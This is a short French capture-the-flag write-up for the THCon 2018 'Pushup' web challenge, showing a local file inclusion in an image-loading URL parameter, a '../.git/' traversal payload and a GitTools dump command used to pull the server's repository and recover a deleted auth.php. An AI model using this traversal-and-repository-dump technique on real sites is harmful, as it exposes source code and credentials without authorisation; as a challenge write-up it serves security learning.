Tags: web git 

Rating:

**Web - Pushup - 300pts**

Enoncé :
```
You like pushups ? Because I like pushups. I found a website about pushups, let's pushup!

https://pushup.thcon.party

HINT Le développeur vient de m'appeler: il m'a dit qu'il était OK pour vous filer le code source du site, il a commit les changements mais il n'a pas push ..
```

**Résolution :**

Sur la page d'accueil le lien qui charge l'image nous semble suspect :
```
https://pushup.thcon.party/assets/png/load_image.png?_=muscle.png
```

Après plusieurs essais on remarque la présence d'une LFI.
On se sert de cette LFI pour récupérer le dossier .git présent sur le serveur avec [Gittools](https://github.com/internetwache/GitTools) :

```BASH
./gitdumper.sh "https://pushup.thcon.party/assets/png/load_image.png?_=../.git/" th_web300
```
On regarde la liste des commits :
```BASH
git log
```
On obtient un commit intérressant :

```
commit 2e3dfdcfeb22de43101397456f5d344d14f2dc5a
Author: zadig <zadig@riseup.net>
Date: Fri Dec 15 22:02:16 2017 +0100

Ajout de la méthode pour l'authentification

```

```BASH
git checkout 2e3dfdcfeb22de43101397456f5d344d14f2dc5a

```

On fait un git status , le fichier auth.php servant à l'authentification à été supprimé.

Pour le récupérer :

```BASH
git checkout auth.php

```

Contenu du fichier auth.php :

```PHP

```
Une fois le mot de passe entrée on obtient le flag

![Alt](img/flag.png "Flag")

By team Beers4Flags

```
________
| |
| #BFF |
|________|
_.._,_|,_
( | )
]~,"-.-~~[
.=] Beers ([
| ]) 4 ([
'=]) Flags [
|:: ' |
~~----~~
```

Original writeup (https://github.com/Beers4Flags/writeups/tree/master/2018/Thcon/Web/300).